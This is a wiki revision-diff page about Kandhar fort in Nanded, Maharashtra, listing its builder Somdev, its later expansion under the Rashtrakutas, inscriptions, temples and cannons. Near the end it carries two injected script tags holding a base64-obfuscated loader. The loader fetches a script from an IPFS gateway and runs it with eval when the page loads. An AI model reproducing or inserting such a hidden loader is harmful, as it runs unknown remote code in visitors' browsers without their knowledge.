Difference between revisions of "कंदहार दुर्ग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
*कंदहार [[महाराष्ट्र]] राज्य के [[नांदेड़ ज़िला|नांदेड़ ज़िले]] में स्थित पर कंदहार नरेश सोमदेव का बनाया हुआ प्राचीन दुर्ग है।  
 
*कंदहार [[महाराष्ट्र]] राज्य के [[नांदेड़ ज़िला|नांदेड़ ज़िले]] में स्थित पर कंदहार नरेश सोमदेव का बनाया हुआ प्राचीन दुर्ग है।  
*[[मालखेड़]] के राष्ट्रकूट नरेश कृष्ण तृतीय ने इस दुर्ग का विस्तार करवाया था और कंदहारपुर के स्वामी की उपाधि ग्रहण की थी।  
+
*[[मलखेड़ कर्नाटक|मालखेड़]] के राष्ट्रकूट नरेश कृष्ण तृतीय ने इस दुर्ग का विस्तार करवाया था और कंदहारपुर के स्वामी की उपाधि ग्रहण की थी।  
 
*दुर्ग [[मुहम्मद बिन तुग़लक़]], इब्राहिम आदिलशाह और [[औरंगज़ेब]] के समय के अभिलेख हैं।  
 
*दुर्ग [[मुहम्मद बिन तुग़लक़]], इब्राहिम आदिलशाह और [[औरंगज़ेब]] के समय के अभिलेख हैं।  
 
*अभिलेखों पर उनके निर्माताओं के नाम खुदे हैं।  
 
*अभिलेखों पर उनके निर्माताओं के नाम खुदे हैं।  

Revision as of 06:39, 30 October 2010

  • kandahar maharashtr rajy ke naande d zile mean sthit par kandahar naresh somadev ka banaya hua prachin durg hai.
  • malakhe d ke rashtrakoot naresh krishna tritiy ne is durg ka vistar karavaya tha aur kandaharapur ke svami ki upadhi grahan ki thi.
  • durg muhammad bin tugalaq, ibrahim adilashah aur aurangazeb ke samay ke abhilekh haian.
  • abhilekhoan par unake nirmataoan ke nam khude haian.
  • jama-masjid par ibrahim adilashah aur nijamashah ke abhilekh haian.
  • kandahar mean prachin jain evan bauddh mandir bhi haian.
  • is durg ke bhitar kee turki topean bhi rakhi huee haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh